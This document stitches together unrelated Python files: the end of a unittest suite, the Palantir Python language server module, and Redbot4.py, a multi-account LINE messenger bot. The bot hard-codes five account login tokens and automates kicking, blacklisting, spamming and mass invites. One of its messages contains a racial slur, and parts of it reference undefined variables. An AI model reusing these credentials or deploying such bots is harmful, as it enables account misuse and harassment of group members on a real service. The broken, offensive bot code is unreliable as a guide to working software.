suite.addTest(unittest.makeSuite(HashThreadedNoWaitTransactions))
else:
print("Threads not available, skipping thread tests.")
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
python_ls.py
|
# Copyright 2017 Palantir Technologies, Inc.
from functools import partial
import logging
import os
import socketserver
import threading
from pyls_jsonrpc.dispatchers import MethodDispatcher
from pyls_jsonrpc.endpoint import Endpoint
from pyls_jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from . import lsp, _utils, uris
from .config import config
from .workspace import Workspace
log = logging.getLogger(__name__)
LINT_DEBOUNCE_S = 0.5 # 500 ms
PARENT_PROCESS_WATCH_INTERVAL = 10 # 10 s
MAX_WORKERS = 64
PYTHON_FILE_EXTENSIONS = ('.py', '.pyi')
CONFIG_FILEs = ('pycodestyle.cfg', 'setup.cfg', 'tox.ini', '.flake8')
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
# pylint: disable=no-member
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile)
def handle(self):
try:
self.delegate.start()
except OSError as e:
if os.name == 'nt':
# Catch and pass on ConnectionResetError when parent process
# dies
# pylint: disable=no-member, undefined-variable
if isinstance(e, WindowsError) and e.winerror == 10054:
pass
# pylint: disable=no-member
self.SHUTDOWN_CALL()
def start_tcp_lang_server(bind_addr, port, check_parent_process, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError('Handler class must be an instance of PythonLanguageServer')
def shutdown_server(*args):
# pylint: disable=unused-argument
log.debug('Shutting down server')
# Shutdown call must be done on a thread, to prevent deadlocks
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + 'Handler',
(_StreamHandlerWrapper,),
{'DELEGATE_CLASS': partial(handler_class,
check_parent_process=check_parent_process),
'SHUTDOWN_CALL': shutdown_server}
)
server = socketserver.TCPServer((bind_addr, port), wrapper_class)
server.allow_reuse_address = True
try:
log.info('Serving %s on (%s, %s)', handler_class.__name__, bind_addr, port)
server.serve_forever()
finally:
log.info('Shutting down')
server.server_close()
def start_io_lang_server(rfile, wfile, check_parent_process, handler_class):
if not issubclass(handler_class, PythonLanguageServer):
raise ValueError('Handler class must be an instance of PythonLanguageServer')
log.info('Starting %s IO language server', handler_class.__name__)
server = handler_class(rfile, wfile, check_parent_process)
server.start()
class PythonLanguageServer(MethodDispatcher):
""" Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
"""
# pylint: disable=too-many-public-methods,redefined-builtin
def __init__(self, rx, tx, check_parent_process=False):
self.workspace = None
self.config = None
self.root_uri = None
self.watching_thread = None
self.workspaces = {}
self.uri_workspace_mapper = {}
self._jsonrpc_stream_reader = JsonRpcStreamReader(rx)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(tx)
self._check_parent_process = check_parent_process
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write, max_workers=MAX_WORKERS)
self._dispatchers = []
self._shutdown = False
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def __getitem__(self, item):
"""Override getitem to fallback through multiple dispatchers."""
if self._shutdown and item != 'exit':
# exit is the only allowed method during shutdown
log.debug("Ignoring non-exit method during shutdown: %s", item)
raise KeyError
try:
return super(PythonLanguageServer, self).__getitem__(item)
except KeyError:
# Fallback through extra dispatchers
for dispatcher in self._dispatchers:
try:
return dispatcher[item]
except KeyError:
continue
raise KeyError()
def m_shutdown(self, **_kwargs):
self._shutdown = True
return None
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def _match_uri_to_workspace(self, uri):
workspace_uri = _utils.match_uri_to_workspace(uri, self.workspaces)
return self.workspaces.get(workspace_uri, self.workspace)
def _hook(self, hook_name, doc_uri=None, **kwargs):
"""Calls hook_name and returns a list of results from all registered handlers"""
workspace = self._match_uri_to_workspace(doc_uri)
doc = workspace.get_document(doc_uri) if doc_uri else None
hook_handlers = self.config.plugin_manager.subset_hook_caller(hook_name, self.config.disabled_plugins)
return hook_handlers(config=self.config, workspace=workspace, document=doc, **kwargs)
def capabilities(self):
server_capabilities = {
'codeActionProvider': True,
'codeLensProvider': {
'resolveProvider': False, # We may need to make this configurable
},
'completionProvider': {
'resolveProvider': False, # We know everything ahead of time
'triggerCharacters': ['.']
},
'documentFormattingProvider': True,
'documentHighlightProvider': True,
'documentRangeFormattingProvider': True,
'documentSymbolProvider': True,
'definitionProvider': True,
'executeCommandProvider': {
'commands': flatten(self._hook('pyls_commands'))
},
'hoverProvider': True,
'referencesProvider': True,
'renameProvider': True,
'foldingRangeProvider': True,
'signatureHelpProvider': {
'triggerCharacters': ['(', ',', '=']
},
'textDocumentSync': {
'change': lsp.TextDocumentSyncKind.INCREMENTAL,
'save': {
'includeText': True,
},
'openClose': True,
},
'workspace': {
'workspaceFolders': {
'supported': True,
'changeNotifications': True
}
},
'experimental': merge(self._hook('pyls_experimental_capabilities'))
}
log.info('Server capabilities: %s', server_capabilities)
return server_capabilities
def m_initialize(self, processId=None, rootUri=None, rootPath=None, initializationOptions=None, **_kwargs):
log.debug('Language server initialized with %s %s %s %s', processId, rootUri, rootPath, initializationOptions)
if rootUri is None:
rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ''
self.workspaces.pop(self.root_uri, None)
self.root_uri = rootUri
self.config = config.Config(rootUri, initializationOptions or {},
processId, _kwargs.get('capabilities', {}))
self.workspace = Workspace(rootUri, self._endpoint, self.config)
self.workspaces[rootUri] = self.workspace
self._dispatchers = self._hook('pyls_dispatchers')
self._hook('pyls_initialize')
if self._check_parent_process and processId is not None and self.watching_thread is None:
def watch_parent_process(pid):
# exit when the given pid is not alive
if not _utils.is_process_alive(pid):
log.info("parent process %s is not alive, exiting!", pid)
self.m_exit()
else:
threading.Timer(PARENT_PROCESS_WATCH_INTERVAL, watch_parent_process, args=[pid]).start()
self.watching_thread = threading.Thread(target=watch_parent_process, args=(processId,))
self.watching_thread.daemon = True
self.watching_thread.start()
# Get our capabilities
return {'capabilities': self.capabilities()}
def m_initialized(self, **_kwargs):
pass
def code_actions(self, doc_uri, range, context):
return flatten(self._hook('pyls_code_actions', doc_uri, range=range, context=context))
def code_lens(self, doc_uri):
return flatten(self._hook('pyls_code_lens', doc_uri))
def completions(self, doc_uri, position):
completions = self._hook('pyls_completions', doc_uri, position=position)
return {
'isIncomplete': False,
'items': flatten(completions)
}
def definitions(self, doc_uri, position):
return flatten(self._hook('pyls_definitions', doc_uri, position=position))
def document_symbols(self, doc_uri):
return flatten(self._hook('pyls_document_symbols', doc_uri))
def execute_command(self, command, arguments):
return self._hook('pyls_execute_command', command=command, arguments=arguments)
def format_document(self, doc_uri):
return self._hook('pyls_format_document', doc_uri)
def format_range(self, doc_uri, range):
return self._hook('pyls_format_range', doc_uri, range=range)
def highlight(self, doc_uri, position):
return flatten(self._hook('pyls_document_highlight', doc_uri, position=position)) or None
def hover(self, doc_uri, position):
return self._hook('pyls_hover', doc_uri, position=position) or {'contents': ''}
@_utils.debounce(LINT_DEBOUNCE_S, keyed_by='doc_uri')
def lint(self, doc_uri, is_saved):
# Since we're debounced, the document may no longer be open
workspace = self._match_uri_to_workspace(doc_uri)
if doc_uri in workspace.documents:
workspace.publish_diagnostics(
doc_uri,
flatten(self._hook('pyls_lint', doc_uri, is_saved=is_saved))
)
def references(self, doc_uri, position, exclude_declaration):
return flatten(self._hook(
'pyls_references', doc_uri, position=position,
exclude_declaration=exclude_declaration
))
def rename(self, doc_uri, position, new_name):
return self._hook('pyls_rename', doc_uri, position=position, new_name=new_name)
def signature_help(self, doc_uri, position):
return self._hook('pyls_signature_help', doc_uri, position=position)
def folding(self, doc_uri):
return self._hook('pyls_folding_range', doc_uri)
def m_text_document__did_close(self, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
workspace.rm_document(textDocument['uri'])
def m_text_document__did_open(self, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
workspace.put_document(textDocument['uri'], textDocument['text'], version=textDocument.get('version'))
self._hook('pyls_document_did_open', textDocument['uri'])
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__did_change(self, contentChanges=None, textDocument=None, **_kwargs):
workspace = self._match_uri_to_workspace(textDocument['uri'])
for change in contentChanges:
workspace.update_document(
textDocument['uri'],
change,
version=textDocument.get('version')
)
self.lint(textDocument['uri'], is_saved=False)
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument['uri'], is_saved=True)
def m_text_document__code_action(self, textDocument=None, range=None, context=None, **_kwargs):
return self.code_actions(textDocument['uri'], range, context)
def m_text_document__code_lens(self, textDocument=None, **_kwargs):
return self.code_lens(textDocument['uri'])
def m_text_document__completion(self, textDocument=None, position=None, **_kwargs):
return self.completions(textDocument['uri'], position)
def m_text_document__definition(self, textDocument=None, position=None, **_kwargs):
return self.definitions(textDocument['uri'], position)
def m_text_document__document_highlight(self, textDocument=None, position=None, **_kwargs):
return self.highlight(textDocument['uri'], position)
def m_text_document__hover(self, textDocument=None, position=None, **_kwargs):
return self.hover(textDocument['uri'], position)
def m_text_document__document_symbol(self, textDocument=None, **_kwargs):
return self.document_symbols(textDocument['uri'])
def m_text_document__formatting(self, textDocument=None, _options=None, **_kwargs):
# For now we're ignoring formatting options.
return self.format_document(textDocument['uri'])
def m_text_document__rename(self, textDocument=None, position=None, newName=None, **_kwargs):
return self.rename(textDocument['uri'], position, newName)
def m_text_document__folding_range(self, textDocument=None, **_kwargs):
return self.folding(textDocument['uri'])
def m_text_document__range_formatting(self, textDocument=None, range=None, _options=None, **_kwargs):
# Again, we'll ignore formatting options for now.
return self.format_range(textDocument['uri'], range)
def m_text_document__references(self, textDocument=None, position=None, context=None, **_kwargs):
exclude_declaration = not context['includeDeclaration']
return self.references(textDocument['uri'], position, exclude_declaration)
def m_text_document__signature_help(self, textDocument=None, position=None, **_kwargs):
return self.signature_help(textDocument['uri'], position)
def m_workspace__did_change_configuration(self, settings=None):
self.config.update((settings or {}).get('pyls', {}))
for workspace_uri in self.workspaces:
workspace = self.workspaces[workspace_uri]
workspace.update_config(self.config)
for doc_uri in workspace.documents:
self.lint(doc_uri, is_saved=False)
def m_workspace__did_change_workspace_folders(self, added=None, removed=None, **_kwargs):
for removed_info in removed:
removed_uri = removed_info['uri']
self.workspaces.pop(removed_uri)
for added_info in added:
added_uri = added_info['uri']
self.workspaces[added_uri] = Workspace(added_uri, self._endpoint, self.config)
# Migrate documents that are on the root workspace and have a better
# match now
doc_uris = list(self.workspace._docs.keys())
for uri in doc_uris:
doc = self.workspace._docs.pop(uri)
new_workspace = self._match_uri_to_workspace(uri)
new_workspace._docs[uri] = doc
def m_workspace__did_change_watched_files(self, changes=None, **_kwargs):
changed_py_files = set()
config_changed = False
for d in (changes or []):
if d['uri'].endswith(PYTHON_FILE_EXTENSIONS):
changed_py_files.add(d['uri'])
elif d['uri'].endswith(CONFIG_FILEs):
config_changed = True
if config_changed:
self.config.settings.cache_clear()
elif not changed_py_files:
# Only externally changed python files and lint configs may result in changed diagnostics.
return
for workspace_uri in self.workspaces:
workspace = self.workspaces[workspace_uri]
for doc_uri in workspace.documents:
# Changes in doc_uri are already handled by m_text_document__did_save
if doc_uri not in changed_py_files:
self.lint(doc_uri, is_saved=False)
def m_workspace__execute_command(self, command=None, arguments=None):
return self.execute_command(command, arguments)
def flatten(list_of_lists):
return [item for lst in list_of_lists for item in lst]
def merge(list_of_dicts):
return {k: v for dictionary in list_of_dicts for k, v in dictionary.items()}
|
Redbot4.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re,os,subprocess
cl = LINETCR.LINE()
cl.login(token="EqQNKPSnbQ84wRP9QmU3.rQbq68XMQqTh/UyLzuFmuW.fgs+hV8Nze3kyMIhzeMOqBG+fcV7pQcPFlLT7pC2XQc=")
cl.loginResult()
ki = LINETCR.LINE()
ki.login(token="EqcvWxSWkZLXvNuO60S3.FXP8F/ZJ0UQHfIxYmKf0iW.zVXWYhHzAUu3+pcJ0cImPjX9peYm+h/P5+1r29K3m5Y=")
ki.loginResult()
kk = LINETCR.LINE()
kk.login(token="EqQYiuojsIVJ0uXI8oU7.zwSmQzsHYBrI/F629A4XDW.B70LRj2iJvz8ehHul01XWD0W3CkCo5DlRn0WjRIEJYA=")
kk.loginResult()
kc = LINETCR.LINE()
kc.login(token="EqzFBUjI8B1viqla4da9.gU3VI4Ik4qJzA6Y8uftMEq.DSyFLWGVwKsRelfnRmCv2bcCtm6mIy7jVBpWtuq7Glc=")
kc.loginResult()
ks = LINETCR.LINE()
ks.login(token="EqlCJd8ELUvEBwD97My8.wZxjCuYJwwfJnE+TIiu3Qa.ptsqYuZXwrSfCFDa6dNoVRqbfxSl6EEBrMkgVgKvohA=")
ks.loginResult()
print "login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage ="""╔═════════════
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
™By ✰Ŕèďśámúŕi✰
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
║╔════════════
║╠[1]Status
║╠[2]Bot?
║╠[3]Respon
║╠[4]Cctv→Ciduk
║╠[5]Tagall
║╠[6]Banlist
║╠[7]Me
║╠[8]Info group
║╠[9]Cancel
║╠[10]Open/Close Qr
║╠[11]Gurl
║╠[12]Gn
║╠[13]Mid @
║╠[14]Nk @
║╠[15]Qr on/off
║╠[16]Cancel on/off
║╠[17]Join on/off
║╠[18]Share on/off
║╠[19]Bot Add @
║╠[20]Bc
║╠[21]Spam
║╠[22]Bot1/2 rename
║╠[23]Allbio:
║╠[24]Copy←→Backup
║╠[25]List group
║╠[26]/invitemeto:
║╠[27]SpamInvite
║╠[28]Ban all
║╠[29]Clear ban
║╠[30]Like
║╠[31]Like me
║╠[32]เข้ามา
║╠[33]Red bye
║╠[34]ลบรัน
║║★And More★
║╚════════════
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
║™By ✰Ŕèďśámúŕi✰
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
╚═════════════"""
helpgroup =""" ╔═════════════
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
™By ✰Ŕèďśámúŕi✰
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
║╔════════════
║╠[1]Red on/off
║╠[2]Red1/2 open qr
║╠[3]red say hi
║╠[4]Cctv→Ciduk
║╠[5]Tagall
║╠[6]Banlist
║╠[7]Spam on/off(จำนวน)(ข้อความ)
║╠[8]Info group
║╠[9]Cancel
║╠[10]Open/Close Qr
║╠[11]Gurl
║╠[12]Gn
║╠[13]Mid @
║╠[14]Nk @
║╠[15]Qr on/off
║╠[16]Cancel on/off
║╠[17]Join on/off
║╠[18]Status/Set/Cek
║╠[19]Protect on/off
║╠[20]Cancel on/off
║╠[21]Invite on/off
║╠[21]Qr on/off
║╠[22]Contact on/off
║╠[23]Reade op
║╠[24]Cancel all
║╠[25]Cider on/off
║╠[26]ดึง
╠╠[27]ขอมุข
╠╠[28]เบิร์ดเดย์
╠╠[29]รับแขก
╠╠[30]แคปชั่น
╠╠[31]นับเลข
╠╠[32]สวย
╠╠[33]ทักทาย/มอนิ่ง/หวัดดี
║║★And More★
║╚════════════
║𖤓≛≛≛≛≛≛≛≛≛≛≛≛≛𖤓
║™By ✰Ŕèďśámúŕi✰
╚═════════════"""
KAC=[cl,ki,kk,kc,ks]
DEF1=[ki,kk,kc,ks,]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = ks.getProfile().mid
Bots=[mid,Amid,Bmid,Cmid,Dmid]
admin=["u315686c81f95c34107ff8e2dd9927518","u685f98d0edab398bbbc0bcfdf0a33be1","u94a1bc387b927e86756334648d314f86","u5b35c9714ca359616335efed888537a8","ube52b8931eee2e15a1b689377e3e5637","u1aedef8b888ae108d96bacbc5054e679","u99cde2e2a4a4b11bfd4cc418913e8986","u1865fbab05ea885ca7bd481ec35c9a1d","u46a050ebcc66a90b47fae6256547cc53","u656b0ca994a1c9b462f9feb6f5ae3177","ub5abe828cd964292195c3c59d6322033","uc360193fd87f05f352673cadbd9f2947","u3a737b8dc7135de09ceb6741c46d709f","ub2a4ba24b217b1bd64336a8a8cca11a1","uecdd917f87c7a68b90fe3055cd79fb48","ub4aee366a1b1607f7201b788843f1876"]
owner=["u315686c81f95c34107ff8e2dd9927518","u685f98d0edab398bbbc0bcfdf0a33be1","u94a1bc387b927e86756334648d314f86","u5b35c9714ca359616335efed888537a8","ube52b8931eee2e15a1b689377e3e5637","u1aedef8b888ae108d96bacbc5054e679","u99cde2e2a4a4b11bfd4cc418913e8986","u1865fbab05ea885ca7bd481ec35c9a1d","u46a050ebcc66a90b47fae6256547cc53","u656b0ca994a1c9b462f9feb6f5ae3177","ub5abe828cd964292195c3c59d6322033","uc360193fd87f05f352673cadbd9f2947","u3a737b8dc7135de09ceb6741c46d709f","ub2a4ba24b217b1bd64336a8a8cca11a1","uecdd917f87c7a68b90fe3055cd79fb48","ub4aee366a1b1607f7201b788843f1876"]
whitelist=["u315686c81f95c34107ff8e2dd9927518","u685f98d0edab398bbbc0bcfdf0a33be1","u94a1bc387b927e86756334648d314f86","u5b35c9714ca359616335efed888537a8","ube52b8931eee2e15a1b689377e3e5637","u1aedef8b888ae108d96bacbc5054e679","u99cde2e2a4a4b11bfd4cc418913e8986","u1865fbab05ea885ca7bd481ec35c9a1d","u46a050ebcc66a90b47fae6256547cc53","u656b0ca994a1c9b462f9feb6f5ae3177","ub5abe828cd964292195c3c59d6322033","uc360193fd87f05f352673cadbd9f2947","u3a737b8dc7135de09ceb6741c46d709f","ub2a4ba24b217b1bd64336a8a8cca11a1","uecdd917f87c7a68b90fe3055cd79fb48","ub4aee366a1b1607f7201b788843f1876"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':True,
'autoAdd':True,
'message':"""
Thx add me
Idline: http://line.me/ti/p/~Samuri5""",
"lang":"JP",
"comment":"Thanks for add me",
"commentOn":False,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":" ",
"cName2":" ",
"cName3":" ",
"cName4":" ",
"cName5":" ",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"Protectgr":True,
#"Protectjoin":True,
"Protectcancl":True,
"protectionOn":True,
"atjointicket":True
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
setTime = {}
setTime = wait2['setTime']
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#------Protect Group Kick start------#
if op.type == 11:
if wait["Protectgr"] == True:
if cl.getGroup(op.param1).preventJoinByTicket == False:
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
try:
cl.sendText(op.param1,cl.getContact(op.param2).displayName + "คุณไม่ได้รับอนุญาตให้เปิดลิ้งค์")
cl.kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "คุณไม่ได้รับอนุญาตให้เปิดลิ้งค์")
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
Z = random.choice(KAC).getGroup(op.param1)
Z.preventJoinByTicket = True
random.choice(KAC).updateGroup(Z)
#------Protect Group Kick finish-----#
#------Cancel Invite User start------#
if op.type == 13:
if wait["Protectcancl"] == True:
group = cl.getGroup(op.param1)
gMembMids = [contact.mid for contact in group.invitee]
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1, gMembMids)
random.choice(KAC).sendText(op.param1, "โปรดอย่ายกเชิญ?\nขณะที่เปิดระบบป้องกันการยกเชิญอยู่😛")
#------Cancel Invite User finish------#
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
cl.acceptGroupInvitation(op.param1)
else:
cl.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Amid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
ki.acceptGroupInvitation(op.param1)
else:
ki.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Bmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
kk.acceptGroupInvitation(op.param1)
else:
kk.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Cmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
kc.acceptGroupInvitation(op.param1)
else:
kc.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
if Dmid in op.param3:
if wait["autoJoin"] == True:
if op.param2 in Bots or owner:
ks.acceptGroupInvitation(op.param1)
else:
ks.rejectGroupInvitation(op.param1)
else:
print "autoJoin is Off"
#------Joined User Kick start------#
#if op.type == 17: #awal 17 ubah 13
#if wait["Protectjoin"] == True:
#if op.param2 not in admin and Bots : # Awalnya admin doang
#random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
#------Joined User Kick start------#
if op.type == 19: #Member Ke Kick
if op.param2 in Bots:
pass
elif op.param2 in admin:
pass
elif op.param2 in whitelist:
pass
else:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
#f=codecs.open('st2__b.json','w','utf-8')
#json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
wait["blacklist"][op.param2] = True
#f=codecs.open('st2__b.json','w','utf-8')
#json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.type == 19: #bot Ke Kick
if op.param2 in Bots:
pass
if op.param2 in admin:
pass
else:
if op.param3 in mid:
if op.param2 not in Bots or admin:
try:
G = ki.getGroup(op.param1)
kk.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
kk.updateGroup(G)
Ticket = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
kk.updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(KAC).getGroup(op.param1) #Sanji Bertindak
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in Bmid:
if op.param2 not in Bots or admin:
try:
G = kc.getGroup(op.param1)
kc.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
kc.updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(KAC).getGroup(op.param1) #Sanji Bertindak
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in Cmid:
if op.param2 not in Bots or admin:
try:
G = ks.getGroup(op.param1)
ks.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
ks.updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(KAC).getGroup(op.param1) #Sanji Bertindak
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in Dmid:
if op.param2 not in Bots or admin:
try:
G = cl.getGroup(op.param1)
cl.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
ks.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
cl.updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
G = random.choice(KAC).getGroup(op.param1) #Sanji Bertindak
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
random.choice(KAC).updateGroup(G)
Ticket = random.choice(KAC).reissueGroupTicket(op.param1)
ks.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.01)
G.preventJoinByTicket = True
random.choice(KAC).updateGroup(G)
wait["blacklist"][op.param2] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
if op.param3 in admin:
if op.param2 not in Bots:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[admin])
wait["blacklist"][op.param2] = True
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[op.param3])
wait["blacklist"][op.param2] = True
except:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).inviteIntoGroup(op.param1,[admin])
wait["blacklist"][op.param2] = True
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["ricoinvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
ki.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
cl.sendText(msg.to,"ขออภัย, " + _name + " บัญชีนี้อยู่ในรายการที่ถูกแบน")
cl.sendText(msg.to,"กรุณาแก้แบนก่อน !, \nโดยใช้คำสั่งนี้➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
ki.findAndAddContactsByMid(target)
ki.inviteIntoGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Invited this nigga💋: \n➡" + _name)
wait2["ricoinvite"] = False
break
except:
cl.sendText(msg.to,"Negative, Err0r Detected")
wait2["ricoinvite"] = False
break
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
